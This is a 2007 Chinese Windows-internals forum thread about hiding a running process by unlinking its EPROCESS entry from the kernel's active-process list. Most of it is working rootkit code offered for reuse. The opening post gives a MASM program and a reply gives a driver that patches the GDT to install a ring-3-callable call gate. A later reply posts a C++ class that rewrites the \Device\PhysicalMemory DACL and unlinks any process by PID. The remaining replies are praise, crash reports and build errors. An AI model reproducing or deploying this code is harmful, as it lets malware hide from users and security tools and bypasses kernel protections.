阅读:6636回复:31
俺也来讲讲课,献献丑吧!
很多贴子都写过如何修改活动进程链来隐藏进程,但大多不说明原因,让别人知其然不知其所以然,今天俺来发个贴子献献丑。
大家可能使用过PsGetCurrentProcess函数来获取当前线程的EPROCESS,如果你反汇编这个函数的话,你一定会发现这可能是内核中最简单的一个函数了,只有三行: mov eax, fs:0x00000124; mov eax, [eax + 0x44]; ret 这么简单的代码也行?当然可以!Windows中有一个叫Kernel's Processor Control Block (KPRCB),核心处理控制块)模块的好东东,它总是位于0xffdff120地址,它的数据结构也不复杂,双字指向一个地址,这个地址叫做ETHREAD块,0xffdff124指向当前线程的ETHREAD块,再下一个就是下个线程的ETHREAD块,简单吧,ETHREAD块的数据结构相对复杂,不过你只需要知道它的offset 0x44处为EPROCESS块的地址就可以了,这就是三行代码就可以得到当前线程的EPROCESS地址的原因!EPROCESS块中有个有趣的数据结构叫活动进程链,它只有两个双字,一个FlINK,一个BLINK,FLINK指向下一个EPROCESS块的FLINK地址,BLINK则指向上一个EPROCESS块的BLINK地址,要想隐藏进程的话,只需要把自己脱链就可以了,呵呵! mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址 mov eax,[eax+44h] ;EPROCESS地址 mov ecx,088h ;XP中活动进程链地址,NT下为0x98,2000下为0xA0,自己看着办吧! mov esi,dword ptr[eax+ecx] ;XP中FLINK mov edi,dword ptr[eax+ecx+4] ;BLINK mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK mov dword ptr[edi],esi ;FLINK放到前一个FLINK 以下是一个例子! .386p .model flat, stdcall option casemap:none include \masm32\include\windows.inc include \masm32\include\kernel32.inc include \masm32\include\user32.inc include macros.asm include masm32.inc include debug.inc include advapi32.inc includelib debug.lib includelib masm32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib advapi32.lib .data dwFileSize dd 0 hFile dd 0 hMemory dd 0 pMemory dd 0 FunBase dd 0b6a8h tmp db 50 dup(90) Callgt dd 0 dw 353h .data? hInstance HINSTANCE ? CommandLine LPSTR ? .code WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD LOCAL wc:WNDCLASSEX LOCAL msg:MSG LOCAL hwnd:HWND mov wc.cbSize,SIZEOF WNDCLASSEX mov wc.style, CS_HREDRAW or CS_VREDRAW mov wc.lpfnWndProc, OFFSET WndProc mov wc.cbClsExtra,NULL mov wc.cbWndExtra,NULL push hInst pop wc.hInstance mov wc.hbrBackground,COLOR_WINDOW+1 mov wc.lpszMenuName,NULL mov wc.lpszClassName,CTXT("HIDE") invoke LoadIcon,NULL,IDI_APPLICATION mov wc.hIcon,eax mov wc.hIconSm,0 invoke LoadCursor,NULL,IDC_ARROW mov wc.hCursor,eax invoke RegisterClassEx, addr wc INVOKE CreateWindowEx,NULL,CTXT("HIDE"),CTXT("HIDE"),\ WS_OVERLAPPEDWINDOW,CW_USEDEFAULT,\ CW_USEDEFAULT,CW_USEDEFAULT,CW_USEDEFAULT,NULL,NULL,\ hInst,NULL mov hwnd,eax INVOKE ShowWindow, hwnd,SW_SHOWNORMAL INVOKE UpdateWindow, hwnd .WHILE TRUE INVOKE GetMessage, ADDR msg,NULL,0,0 .BREAK .IF (!eax) INVOKE TranslateMessage, ADDR msg INVOKE DispatchMessage, ADDR msg .ENDW mov eax,msg.wParam ret WinMain endp WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM LOCAL hdc:HDC LOCAL ps:PAINTSTRUCT LOCAL rect:RECT .IF uMsg==WM_CLOSE invoke DestroyWindow,hWnd invoke PostQuitMessage,NULL .ELSEIF uMsg==WM_PAINT invoke BeginPaint,hWnd, ADDR ps mov hdc,eax invoke GetClientRect,hWnd, ADDR rect invoke DrawText, hdc,CTXT("不用ICESWORD,你能看见俺吗?"),-1, ADDR rect, DT_SINGLELINE or DT_CENTER or DT_VCENTER invoke EndPaint,hWnd, ADDR ps .ELSE invoke DefWindowProc,hWnd,uMsg,wParam,lParam ret .ENDIF xor eax,eax ret WndProc endp _OpenSys proc local hSCManager:HANDLE local hService:HANDLE local acDriverPath[MAX_PATH]:CHAR ; Open a handle to the SC Manager database invoke OpenSCManager, NULL, NULL, SC_MANAGER_CREATE_SERVICE .if eax != NULL mov hSCManager, eax push eax invoke GetFullPathName, CTXT("sys.sys",0), sizeof acDriverPath, addr acDriverPath, esp pop eax ; Register driver in SCM active database invoke CreateService, hSCManager, CTXT("sys",0), CTXT("System",0), \ SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \ SERVICE_ERROR_IGNORE, addr acDriverPath, NULL, NULL, NULL, NULL, NULL .if eax != NULL mov hService, eax invoke StartService, hService, 0, NULL ; Here driver beeper.sys plays its nice melody ; and reports error to be removed from memory ; Remove driver from SCM database invoke DeleteService, hService invoke CloseServiceHandle, hService .else invoke MessageBox, NULL, CTXT("Can't register driver.",0), NULL, MB_ICONSTOP .endif invoke CloseServiceHandle, hSCManager .else invoke MessageBox, NULL, CTXT("Can't connect to Service Control Manager.",0), \ NULL, MB_ICONSTOP .endif ret _OpenSys endp start: invoke _OpenSys call fword ptr [Callgt] ;use callgate to Ring0! mov eax,esp ;save ring0 esp mov esp,[esp+4];->ring3 esp push eax pushfd pushad mov eax,dword ptr ds:[0ffdff124h] ;ETHREAD地址 mov eax,[eax+44h] ;EPROCESS地址 mov ecx,088h mov esi,dword ptr[eax+ecx] ;XP中FLINK mov edi,dword ptr[eax+ecx+4] ;BLINK mov dword ptr[esi+4],edi ;BLINK放到后一个BLINK mov dword ptr[edi],esi ;FLINK放到前一个FLINK popad popfd pop esp ;restore ring0 esp push offset Exit retf Exit: invoke _OpenSys invoke Sleep,2 ; invoke GetModuleHandle, NULL mov hInstance,eax invoke GetCommandLine invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT invoke ExitProcess,NULL end start |
|
最新喜欢:TOMG20... |
沙发#
发布于:2007-04-06 11:38
不错:) 赞一个
如果能用c改一下,估计更方便阅读和理解了:) |
|
|
板凳#
发布于:2007-04-06 11:56
写的挺好。不错不错。收藏。
|
|
|
地板#
发布于:2007-04-06 12:59
很实用...
|
|
地下室#
发布于:2007-04-07 14:22
sys.sys里做了什么呢?有代码看看吗?
|
|
驱动小牛
|
5楼#
发布于:2007-04-08 10:21
与FU的技术一样.
|
6楼#
发布于:2007-04-08 11:24
引用第4楼tiaozi2000于2007-04-07 14:22发表的“”: sys.sys只是负责生成一个调用门,代码如下: ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; ; CallGate - Kernel Mode Driver ; ; Written by zjjmj2002 (zjjmj2002@tom.com) ; ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .386 .model flat, stdcall option casemap:none ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; I N C L U D E F I L E S ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: include \masm32\include\w2k\ntstatus.inc include \masm32\include\w2k\ntddk.inc ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; C O D E ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: .code ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; DriverEntry ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING pushfd pushad push edx sgdt [esp-2] pop edx mov eax,edx mov ecx,350h .if dword ptr [edx+ecx+2]!=0ec000358h mov byte ptr [edx],0c3h mov word ptr [edx+ecx],ax shr eax,16 mov word ptr [edx+ecx+6],ax mov dword ptr [edx+ecx+2],0ec000358h mov dword ptr [edx+ecx+8],0000ffffh mov dword ptr [edx+ecx+12],00cf9a00h .endif popad popfd mov eax, STATUS_DEVICE_CONFIGURATION_ERROR ret DriverEntry endp ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ; ;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: end DriverEntry |
|
7楼#
发布于:2007-04-08 17:00
...无语~全是汇编~
|
|
|
8楼#
发布于:2007-04-08 18:22
这种精神值得提倡,共同学习提高技术!
|
|
9楼#
发布于:2007-04-08 20:33
引用第7楼killvxk于2007-04-08 17:00发表的“”: 嘿嘿,俺职业又不是程序员,编程只是业余爱好,当然是什么顺手用什么乐。 |
|
10楼#
发布于:2007-04-12 14:45
很感谢LZ,又学到一手。。。
测试程序在WIN2K和WIN2K3上,蓝屏,死机。。。。 WINXP SP2正常,为什么呢? |
|
11楼#
发布于:2007-04-12 18:44
LS没仔细看LZ的文章
|
|
12楼#
发布于:2007-04-14 23:28
恩,很好,赞一个:)
|
|
13楼#
发布于:2007-04-15 08:48
写的非常好,赞一个.
|
|
|
14楼#
发布于:2007-04-18 17:57
---------- nmake ----------
Microsoft (R) Program Maintenance Utility Version 6.00.8168.0 Copyright (C) Microsoft Corp 1988-1998. All rights reserved. ml /c /coff hide.asm Microsoft (R) Macro Assembler Version 6.15.8803 Copyright (C) Microsoft Corp 1981-2000. All rights reserved. Assembling: hide.asm hide.asm(110) : error A2136: too many arguments to INVOKE hide.asm(110) : error A2208: missing left parenthesis in expression hide.asm(110) : error A2114: INVOKE argument type mismatch : argument : 2 hide.asm(110) : error A2084: constant value too large hide.asm(110) : error A2114: INVOKE argument type mismatch : argument : 1 hide.asm(114) : error A2136: too many arguments to INVOKE hide.asm(114) : error A2208: missing left parenthesis in expression hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 5 hide.asm(114) : error A2084: constant value too large hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 4 hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 3 hide.asm(114) : error A2207: missing right parenthesis in expression hide.asm(114) : error A2114: INVOKE argument type mismatch : argument : 2 hide.asm(126) : error A2136: too many arguments to INVOKE hide.asm(126) : error A2208: missing left parenthesis in expression hide.asm(126) : error A2114: INVOKE argument type mismatch : argument : 3 hide.asm(126) : error A2084: constant value too large hide.asm(126) : error A2114: INVOKE argument type mismatch : argument : 2 hide.asm(130) : error A2136: too many arguments to INVOKE hide.asm(130) : error A2208: missing left parenthesis in expression hide.asm(130) : error A2114: INVOKE argument type mismatch : argument : 3 hide.asm(130) : error A2084: constant value too large hide.asm(130) : error A2114: INVOKE argument type mismatch : argument : 2 NMAKE : fatal error U1077: 'ml' : return code '0x1' Stop. Normal Termination |
|
15楼#
发布于:2007-04-26 15:55
引用第14楼cppdev于2007-04-18 17:57发表的“”: ---------------------------------------------- 这种错误还是自己搞定,不是人家代码的问题, 楼主没义务,帮你做这么简单而繁琐的事情 |
|
16楼#
发布于:2007-04-27 12:00
汇编,看不懂...
|
|
17楼#
发布于:2007-04-27 18:25
好吧,我把我的应用层实现贴出来:)
// HideProcess.cpp: implementation of the CHideProcess class. //进程隐藏程序 // 要隐藏时调用HideProcess即可 ////////////////////////////////////////////////////////////////////// #include <windows.h> #include <Accctrl.h> #include <Aclapi.h> #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; #define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; // // SYSTEM_INFORMATION_CLASS // typedef enum _SYSTEM_INFORMATION_CLASS { SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; // // SYSTEM_HANDLE_INFORMATION // Information Class 16 // typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes ); typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL ); RTLINITUNICODESTRING RtlInitUnicodeString = NULL; ZWOPENSECTION ZwOpenSection = NULL; ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; //--------------------------------------------------------------------------- BOOL CHideProcess::m_bInit = FALSE; CHideProcess CHideProcess::m_NoAction; ////////////////////////////////////////////////////////////////////// // Construction/Destruction ////////////////////////////////////////////////////////////////////// CHideProcess::CHideProcess() { m_bInit = InitNTDLL(); } CHideProcess::~CHideProcess() { CloseNTDLL(); } // load dll and get functions BOOL CHideProcess::InitNTDLL() { // load dll if (NULL == g_hNtDLL) { g_hNtDLL = LoadLibrary(_T("ntdll.dll")); if (NULL == g_hNtDLL) { return FALSE; } } // get functions RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" ); if ((RtlInitUnicodeString == NULL) || (ZwOpenSection == NULL) || (ZwQuerySystemInformation == NULL)) { return FALSE; } m_bInit = TRUE; return TRUE; } //--------------------------------------------------------------------------- VOID CHideProcess::CloseNTDLL() { if (NULL != g_hNtDLL) { FreeLibrary(g_hNtDLL); g_hNtDLL = NULL; m_bInit = FALSE; } } //--------------------------------------------------------------------------- VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo( hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD ); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo( hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL ); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } } //--------------------------------------------------------------------------- HANDLE CHideProcess::OpenPhysicalMemory() { NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion) return NULL; switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory = 0x30000; break; // 2k case 1: PhyDirectory = 0x39000; break; // xp case 2: PhyDirectory = 0x39000; break; // 2k03 default: AfxMessageBox(_T("init PhysicalMemory: Unknown version...")); TFileTrace(_T("init PhysicalMemory: Unknown version...\n")); return NULL; } RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); } if(!NT_SUCCESS(status)) { AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed...")); TFileTrace(_T("Open section: \\Device\\PhysicalMemory failed...\n")); return NULL; } TFileTrace(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory); g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection g_hMPM, // handle FILE_MAP_READ|FILE_MAP_WRITE, 0, // offset high part PhyDirectory, // offset low part 0x1000 // size ); if( g_pMapPhysicalMemory == NULL ) { AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed...")); TFileTrace(_T("\\Device\\PhysicalMemory MapViewOfFile failed...")); return NULL; } return g_hMPM; } //--------------------------------------------------------------------------- PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr) { ULONG VAddr = (ULONG)addr; ULONG PGDE = BaseAddress[VAddr>>22]; ULONG PTE; ULONG PAddr; if (0 == (PGDE & 1)) return 0; ULONG tmp = PGDE & 0x00000080; if (0 != tmp) { PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else { TFileTrace(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000); PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) return 0; PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } return (PVOID)PAddr; } //--------------------------------------------------------------------------- ULONG CHideProcess::GetData(PVOID addr) { ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); TFileTrace(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"), g_pMapPhysicalMemory, addr, phys); TFileTrace(_T("GetData() OffSet: %p\n"), phys & 0xfffff000); PULONG tmp = (PULONG)MapViewOfFile( g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, // offset low part 0x1000 // size ); if (0 == tmp) return 0; ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret; } //--------------------------------------------------------------------------- BOOL CHideProcess::SetData(PVOID addr,ULONG data) { ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); TFileTrace(_T("SetData() OffSet: %p\n"), phys & 0xfffff000); PULONG tmp = (PULONG)MapViewOfFile( g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000 ); if (0 == tmp) return FALSE; tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp); return TRUE; } //--------------------------------------------------------------------------- /* long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp) { ExitProcess(0); return 1 ; } //*/ //--------------------------------------------------------------------------- DWORD CHideProcess::GetEprocessFromPid (ULONG PID) { NTSTATUS status; PVOID buf = NULL; ULONG size = 1; ULONG NumOfHandle = 0; ULONG i; PSYSTEM_HANDLE_INFORMATION h_info = NULL; DWORD dwCurrentID = GetCurrentProcessId(); // TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID); // LocateNtdllEntry( ); //打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5 HANDLE hProc = OpenProcess( // PROCESS_ALL_ACCESS, PROCESS_QUERY_INFORMATION, FALSE, PID // GetCurrentProcessId() // ); if (NULL == hProc) { TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError()); TFileTrace(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError()); return 0; } for ( size = 1024; ; size *= 2 ) { if ( NULL == ( buf = calloc( size, 1 ) ) ) { TRACE( _T("calloc( %u, 1 ) failed\n"), size ); TFileTrace(_T("calloc( %u, 1 ) failed\n"), size ); if ( buf != NULL ) { free( buf ); buf = NULL; } CloseHandle(hProc); return 0; } status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL ); if ( !NT_SUCCESS( status ) ) { if ( STATUS_INFO_LENGTH_MISMATCH == status ) { free( buf ); buf = NULL; continue; } else { TFileTrace( "ZwQuerySystemInformation() failed\n"); TRACE( "ZwQuerySystemInformation() failed\n"); if ( buf != NULL ) { free( buf ); buf = NULL; } CloseHandle(hProc); return 0; } } else { break; } } /* end of for */ //返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组 NumOfHandle = *((PULONG)buf); h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4); for(i = 0; i < NumOfHandle; i++) { if(h_info.ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) ) { // TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"), // PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber); if (h_info.Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5) { // TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"), // PID, hProc, h_info.Object); DWORD dwRet = (DWORD)(h_info.Object); if (buf != NULL) { free( buf ); buf = NULL; } CloseHandle(hProc); return dwRet; } } } if ( buf != NULL ) { free( buf ); buf = NULL; } CloseHandle(hProc); return 0; } // 隐藏进程主函数 BOOL CHideProcess::YHideProcess(DWORD dwID) { // if (!m_bInit) { AfxMessageBox(_T("load NTDLL failed...")); TFileTrace(_T("load NTDLL failed...\n")); return FALSE; } // 获得指向进程的 EPROCESS 数据块的指针 ULONG process = (ULONG)GetEprocessFromPid(dwID); if (process == 0) { // TFileTrace(_T("GetEprocessFromPid() failed...\n")); return FALSE; } TFileTrace(_T("GetEprocessFromPid() process = %p...\n"), process); // 这个是打开对应的系统内存,并且映射为一个核心对象 if (NULL == OpenPhysicalMemory()) { AfxMessageBox(_T("OpenPhysicalMemory() failed...")); TFileTrace(_T("OpenPhysicalMemory() failed...\n")); return FALSE; } // // 下面的两个 if 完成对 Windows 的系统版本判断(只判断了2K和XP), // 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置 ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) { // in Win2000/Vista: fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); } else if ((1 == g_osvi.dwMinorVersion) || (2 == g_osvi.dwMinorVersion)) { // in WinXP: in Win2003 fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } // **** TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw); TFileTrace(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw); // 下面的两个SetData完成对进程活动链的更改, // 也就是让进程活动链跳过当前进程的EPROCESS块 SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw); // 完成了 UnmapViewOfFile(g_pMapPhysicalMemory); g_pMapPhysicalMemory = NULL; CloseHandle(g_hMPM); g_hMPM = NULL; return TRUE; } // 隐藏进程接口 BOOL CHideProcess::HideCurrent() { TFileTrace(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId()); return YHideProcess(GetCurrentProcessId()); } // 隐藏进程接口 BOOL CHideProcess::HideByID(DWORD dwID) { TFileTrace(_T("Hide Process ID = %d \n"), dwID); return YHideProcess(dwID); } |
|
|
18楼#
发布于:2007-04-27 18:33
哇塞,后面的内容怎么自动变成斜体了,是不是因为太长了?
这是比较久的代码了,貌似有点乱~ class CHideProcess { public: // 接口:隐藏当前进程 static BOOL HideCurrent(); // 接口:隐藏当前进程 static BOOL HideByID(DWORD dwID); // 析构 virtual ~CHideProcess(); protected: static BOOL InitNTDLL(); static BOOL YHideProcess(DWORD dwID); static VOID CloseNTDLL(); static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection); static HANDLE OpenPhysicalMemory(); static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr); static ULONG GetData(PVOID addr); static BOOL SetData(PVOID addr,ULONG data); static DWORD GetEprocessFromPid (ULONG PID); // long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp); protected: static BOOL m_bInit; static CHideProcess m_NoAction; private: // 构造析构 CHideProcess(); }; |
|
|
19楼#
发布于:2007-04-28 04:07
好,学习一下
|
|
上一页
下一页